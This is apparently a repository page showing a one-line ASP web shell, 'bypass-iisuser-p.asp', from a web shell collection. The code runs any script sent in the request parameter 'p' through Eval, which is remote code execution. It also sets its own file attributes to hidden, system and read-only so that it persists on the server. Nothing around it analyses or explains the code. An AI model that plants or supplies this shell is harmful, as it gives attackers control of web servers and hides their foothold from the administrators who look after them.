webshell/asp/bypass-iisuser-p.asp

1 line
193 B
Text
Raw Normal View History

2014-03-26 07:41:02 +00:00
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>